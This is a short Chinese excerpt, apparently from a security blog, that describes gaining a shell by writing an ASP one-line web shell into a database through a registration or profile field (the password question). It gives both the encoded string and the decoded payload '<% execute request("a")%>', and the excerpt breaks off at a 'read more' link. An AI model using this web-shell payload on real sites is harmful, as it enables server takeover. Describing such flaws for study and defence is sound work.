爪爪

摘要： 漏洞描述：在用户注册或者修改个人资料中，我们可以注入一句话到数据库中，从而拿到shell 漏洞分析：在密码问题处填写“┼攠數畣整爠煥敵瑳∨≡┩愾”，即“<% execute request("a")%>”经过Erlang 中文简体字 GB2312 转 unicode 转换来的，然后确定就可以了 影响 阅读全文